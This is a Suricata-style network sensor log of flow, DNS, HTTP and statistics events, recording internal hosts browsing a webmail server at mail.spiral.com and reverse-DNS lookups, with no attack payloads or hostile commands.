{"timestamp":"2020-02-29T00:08:08.000688+0000","flow_id":2064146958623533,"event_type":"flow","src_ip":"192.168.10.122","src_port":48633,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:07.238381+0000","end":"2020-02-29T00:03:07.343781+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:08.066104+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44264,"proto":"UDP","dns":{"type":"answer","id":62353,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:08.066104+0000","flow_id":483732157340798,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44264,"proto":"UDP","dns":{"type":"answer","id":62353,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:08.072093+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36865,"proto":"UDP","dns":{"type":"answer","id":47439,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:08.072093+0000","flow_id":739926956553289,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":36865,"proto":"UDP","dns":{"type":"answer","id":47439,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:08.155844+0000","flow_id":1596077147384852,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=zwiFi46-w1WbjcxymnmTfV7&uniq=1582934887646","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5164}} {"timestamp":"2020-02-29T00:08:08.292009+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849}} {"timestamp":"2020-02-29T00:08:09.000709+0000","flow_id":117556125411825,"event_type":"flow","src_ip":"192.168.10.130","src_port":34752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":24,"bytes_toserver":2365,"bytes_toclient":25319,"start":"2020-02-29T00:06:48.567793+0000","end":"2020-02-29T00:07:08.037208+0000","age":20,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:10.000794+0000","flow_id":2220655566946137,"event_type":"flow","src_ip":"192.168.10.122","src_port":49403,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:03:08.950105+0000","end":"2020-02-29T00:03:09.055838+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:10.644824+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7849},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":43729,"tx_id":0}} {"timestamp":"2020-02-29T00:08:10.657157+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46096,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":6009,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:10.765374+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46096,"proto":"UDP","dns":{"type":"answer","id":6009,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:10.765374+0000","flow_id":1075243643438853,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46096,"proto":"UDP","dns":{"type":"answer","id":6009,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:10.820420+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526}} {"timestamp":"2020-02-29T00:08:10.921548+0000","flow_id":1066967241298197,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52700,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8526},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36694,"tx_id":1}} {"timestamp":"2020-02-29T00:08:10.923541+0000","flow_id":1066967241298197,"event_type":"http","src_ip":"192.168.10.81","src_port":52700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","length":0}} {"timestamp":"2020-02-29T00:08:11.000184+0000","event_type":"stats","stats":{"uptime":14143,"capture":{"kernel_packets":133962,"kernel_drops":0},"decoder":{"pkts":133984,"bytes":92620708,"invalid":183,"ipv4":132521,"ipv6":8,"ethernet":133984,"raw":0,"null":0,"sll":0,"tcp":127369,"udp":4954,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094752},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2720,"ssn_memcap_drop":0,"pseudo":341,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2736,"synack":2727,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1763,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2260,"failed_udp":110},"tx":{"http":4557,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2338}},"flow_mgr":{"closed_pruned":2702,"new_pruned":15,"est_pruned":2311,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19512,"memcap_state":0,"memcap_global":0},"http":{"memuse":89242,"memcap":0}}} {"timestamp":"2020-02-29T00:08:11.005418+0000","flow_id":503484692486814,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.123","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:03:10.449182+0000","end":"2020-02-29T00:03:10.451143+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:11.108345+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47136,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15506,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:11.216826+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47136,"proto":"UDP","dns":{"type":"answer","id":15506,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:11.216826+0000","flow_id":417014135629625,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47136,"proto":"UDP","dns":{"type":"answer","id":15506,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:11.283813+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903}} {"timestamp":"2020-02-29T00:08:11.283813+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":173,"tx_id":0}} {"timestamp":"2020-02-29T00:08:13.158140+0000","flow_id":1596077147384852,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34766,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=compose&type=new&token=zwiFi46-w1WbjcxymnmTfV7&uniq=1582934887646","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5164},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":17865,"tx_id":0}} {"timestamp":"2020-02-29T00:08:16.284764+0000","flow_id":422558938389413,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52704,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/dynamicInit","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":903},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/dynamicInit","state":"CLOSED","stored":false,"size":2313,"tx_id":0}} {"timestamp":"2020-02-29T00:08:17.000297+0000","flow_id":285025491706982,"event_type":"flow","src_ip":"192.168.10.130","src_port":34758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1291,"bytes_toclient":1058,"start":"2020-02-29T00:07:11.418918+0000","end":"2020-02-29T00:07:16.615880+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:18.000294+0000","event_type":"stats","stats":{"uptime":14150,"capture":{"kernel_packets":134019,"kernel_drops":0},"decoder":{"pkts":134025,"bytes":92636252,"invalid":183,"ipv4":132560,"ipv6":8,"ethernet":134025,"raw":0,"null":0,"sll":0,"tcp":127404,"udp":4958,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2722,"ssn_memcap_drop":0,"pseudo":342,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2738,"synack":2729,"rst":1197,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1764,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2262,"failed_udp":110},"tx":{"http":4560,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2340}},"flow_mgr":{"closed_pruned":2702,"new_pruned":15,"est_pruned":2313,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19842,"memcap_state":0,"memcap_global":0},"http":{"memuse":37501,"memcap":0}}} {"timestamp":"2020-02-29T00:08:20.380494+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34478,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58896,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:20.488895+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34478,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:20.488895+0000","flow_id":957166403243598,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34478,"proto":"UDP","dns":{"type":"answer","id":58896,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:20.578523+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364}} {"timestamp":"2020-02-29T00:08:20.578523+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":240,"tx_id":0}} {"timestamp":"2020-02-29T00:08:21.001904+0000","flow_id":97464254789635,"event_type":"flow","src_ip":"192.168.10.122","src_port":35466,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:03:20.456707+0000","end":"2020-02-29T00:03:20.562100+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:08:25.000275+0000","event_type":"stats","stats":{"uptime":14157,"capture":{"kernel_packets":134030,"kernel_drops":0},"decoder":{"pkts":134037,"bytes":92638832,"invalid":183,"ipv4":132572,"ipv6":8,"ethernet":134037,"raw":0,"null":0,"sll":0,"tcp":127414,"udp":4960,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2723,"ssn_memcap_drop":0,"pseudo":342,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2739,"synack":2730,"rst":1197,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":140,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1765,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2263,"failed_udp":110},"tx":{"http":4561,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2341}},"flow_mgr":{"closed_pruned":2703,"new_pruned":15,"est_pruned":2314,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19841,"memcap_state":0,"memcap_global":0},"http":{"memuse":76699,"memcap":0}}} {"timestamp":"2020-02-29T00:08:25.579747+0000","flow_id":533480764378464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52706,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/viewPort","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":364},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/viewPort","state":"CLOSED","stored":false,"size":592,"tx_id":0}} {"timestamp":"2020-02-29T00:08:26.000572+0000","flow_id":1214181537235511,"event_type":"flow","src_ip":"192.168.10.81","src_port":52696,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":9,"bytes_toserver":1227,"bytes_toclient":6723,"start":"2020-02-29T00:07:20.213559+0000","end":"2020-02-29T00:07:25.402051+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:08:26.322012+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47740,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35129,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:26.430911+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47740,"proto":"UDP","dns":{"type":"answer","id":35129,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:26.430911+0000","flow_id":427648475654620,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47740,"proto":"UDP","dns":{"type":"answer","id":35129,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:26.514026+0000","flow_id":1506149123404467,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8618}} {"timestamp":"2020-02-29T00:08:26.884224+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":65193,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:08:26.992939+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65193,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:26.992939+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65193,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:27.011353+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49361,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":65194,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:08:27.119823+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65194,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:08:27.119823+0000","flow_id":58766619475456,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49361,"proto":"UDP","dns":{"type":"answer","id":65194,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:08:31.518716+0000","flow_id":1506149123404467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8618},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34775,"tx_id":0}} {"timestamp":"2020-02-29T00:08:32.000293+0000","event_type":"stats","stats":{"uptime":14164,"capture":{"kernel_packets":134072,"kernel_drops":0},"decoder":{"pkts":134077,"bytes":92653227,"invalid":184,"ipv4":132612,"ipv6":8,"ethernet":134077,"raw":0,"null":0,"sll":0,"tcp":127447,"udp":4966,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":691,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2725,"ssn_memcap_drop":0,"pseudo":343,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2741,"synack":2732,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":141,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1766,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2265,"failed_udp":110},"tx":{"http":4562,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2344}},"flow_mgr":{"closed_pruned":2704,"new_pruned":15,"est_pruned":2314,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20503,"memcap_state":0,"memcap_global":0},"http":{"memuse":71338,"memcap":0}}} 